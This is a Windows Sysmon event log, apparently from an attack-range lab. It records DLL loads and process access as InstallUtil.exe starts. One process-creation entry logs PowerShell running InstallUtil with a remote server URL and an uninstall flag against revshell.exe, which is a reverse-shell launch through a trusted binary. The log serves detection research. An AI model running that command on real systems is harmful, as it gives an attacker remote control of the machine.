17:34:10.261{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=2BDBEE1B42063F245AC86F54C236BC4E,SHA256=CD558E008DA76E171FC9B8CF87556353330D7B7BF593B5074E4FEB08BC14CFC6trueMicrosoft WindowsValid 734700x800000000000000057604741Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.246{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7ded6822b7c67ccde0dc9249bee0271b\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=7BF3C3EF641852F9D4CCF7E80B1AFF13,SHA256=C7054ABC20409CCC86D1EF10E8B11369937FB5E81DFD9F15B31639071036CA9FtrueMicrosoft CorporationValid 734700x800000000000000057604740Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.246{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValid 734700x800000000000000057604739Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.246{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=BFE20E1D9BEBE61CD8898663FDACB74E,SHA256=AA416A9E707BE8475051FF502D20077A687D14CF3ABABF4959F489A3B5BFBF8BtrueMicrosoft CorporationValid 734700x800000000000000057604738Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.246{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=071309BE821483287A0FE982AEF005C1,SHA256=932920FE06897C0B2ADAF7FA855E3B45498D213994E81AB8694D9EE5CA53AC0AtrueMicrosoft CorporationValid 13241300x800000000000000057604737Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.246{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7eb-0x806a678e) 734700x800000000000000057604735Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.246{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=9C0F4F0DC954D96E7D70E5FBD85D7EE6,SHA256=A4C9BBF0836A49DADBDD87ED8372D290CCC0A0177B0D4B484AD18DC9C7BCC073trueMicrosoft CorporationValid 734700x800000000000000057604734Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.230{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValid 734700x800000000000000057604733Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.230{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValid 734700x800000000000000057604732Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.230{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValid 734700x800000000000000057604731Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.230{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValid 734700x800000000000000057604730Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.230{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValid 734700x800000000000000057604729Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.230{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F7E6254059E93E3FBD7FE0E3C5615605,SHA256=1AD1D4229C9FF3B4D041E4B4973A83BE2078EECD11E9EC00E4C0B42EAB20E07AtrueMicrosoft WindowsValid 734700x800000000000000057604728Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.230{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValid 734700x800000000000000057604727Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.230{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValid 734700x800000000000000057604726Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.230{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=6FDB4F1612AC70891B9F6E6005AA5DDB,SHA256=6DFEC2EE6E2A7CB4409AB824737A3657E6D66E309AFE83C28E0CE0676687F737trueMicrosoft WindowsValid 734700x800000000000000057604725Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.230{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValid 734700x800000000000000057604724Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=606B77C072A964DA4E4710151CAC86EB,SHA256=C6C9E8D77B62C7A52E6E9EAC764C1E1345779FC17544B80730E507627A5D5120trueMicrosoft CorporationValid 734700x800000000000000057604723Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=D1F45F71014220112988A7BF64EE83EE,SHA256=60E8C6D420FC4AFF309FE9CB53327D8DC4EC541F627E4461C465561512D1ED5DtrueMicrosoft WindowsValid 734700x800000000000000057604722Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValid 734700x800000000000000057604721Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=580643DD40890B231399EA5F57EFAA70,SHA256=0B374B1825ABFF7B26170E75F1B638DF08A15B07660A7DF5533F02853CF266C6trueMicrosoft WindowsValid 734700x800000000000000057604720Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=990CA13B9FE19A5A611F77B333BC9AAD,SHA256=EC3960CAABA4FC0287601311BDCC14D472A165DA7C43F88665D984CE1A0B7DE4trueMicrosoft WindowsValid 734700x800000000000000057604719Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=3394E4EEB4851D80DD7548EC87EAEA5F,SHA256=7F670ACCE58EAADE796FEF335B4EAEAB66DFC47875219B9BE3C9B405A452450BtrueMicrosoft WindowsValid 734700x800000000000000057604718Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValid 734700x800000000000000057604717Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A1EDD29F959E38F8AE4AF9B5CDD2B534,SHA256=CE5ECDC3BEFA2DC8C826A697EAC6CDAC12753258315701130CDEDB19D24DBC75trueMicrosoft WindowsValid 10341000x800000000000000057604716Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-EC34-6172-7AB6-01000000F101}931610168C:\Windows\system32\conhost.exe{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057604715Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=E3B7B5531159A395AC63B7EA256FE7B6,SHA256=B631E93E271E706E0204B606D7851ADF7E65FCA04ACDD73103F0754A9C01007EtrueMicrosoft WindowsValid 734700x800000000000000057604714Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E0C87CF8838DB8C6DBD24A708FCED51B,SHA256=0616E630C7F8E116CE43390638C9CE99209556662C2BBDF5845F1CD03E1C6C4EtrueMicrosoft WindowsValid 734700x800000000000000057604713Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=2582AA6C1F88D34B37B7F82D790D232E,SHA256=AA948BB6583057E2E2F299EBD1717A42D6559CA27AF6BC756D3C3BB4109E4E77trueMicrosoft WindowsValid 734700x800000000000000057604712Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValid 734700x800000000000000057604711Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057604710Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057604709Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E0C87CF8838DB8C6DBD24A708FCED51B,SHA256=0616E630C7F8E116CE43390638C9CE99209556662C2BBDF5845F1CD03E1C6C4EtrueMicrosoft WindowsValid 734700x800000000000000057604708Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057604707Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValid 734700x800000000000000057604706Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.214{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValid 734700x800000000000000057604705Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.199{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4EA36017E45CC2C5D3D2EABEFBE25941,SHA256=6E96551961497DBE66E0329711E4AC670713DF9315B948D7CB5EEAE8C757292FtrueMicrosoft WindowsValid 734700x800000000000000057604704Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.199{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057604703Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.199{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=AF862061889F5B9B956E9469DCDAE773,SHA256=AF5CBD35C7D8DEA7D879113FDA61B0F64AC6618BCDAE15C0C732A018BABF68EEtrueMicrosoft CorporationValid 10341000x800000000000000057604702Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.199{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057604701Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.199{8B6011A9-EC34-6172-79B6-01000000F101}86407060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+50f0099(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45734f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+457312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b45b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4573c13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4573785(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45734f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+457312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b45b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45583d8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+455794a(wow64) 154100x800000000000000057604700Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.196{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" /server=http://192.168.1.1/Y0DNA /U revshell.exeC:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=AF862061889F5B9B956E9469DCDAE773,SHA256=AF5CBD35C7D8DEA7D879113FDA61B0F64AC6618BCDAE15C0C732A018BABF68EE{8B6011A9-EC34-6172-79B6-01000000F101}8640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 534500x800000000000000057605078Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:31.911{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe 534500x800000000000000057614311Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.547{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 734700x800000000000000057614310Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 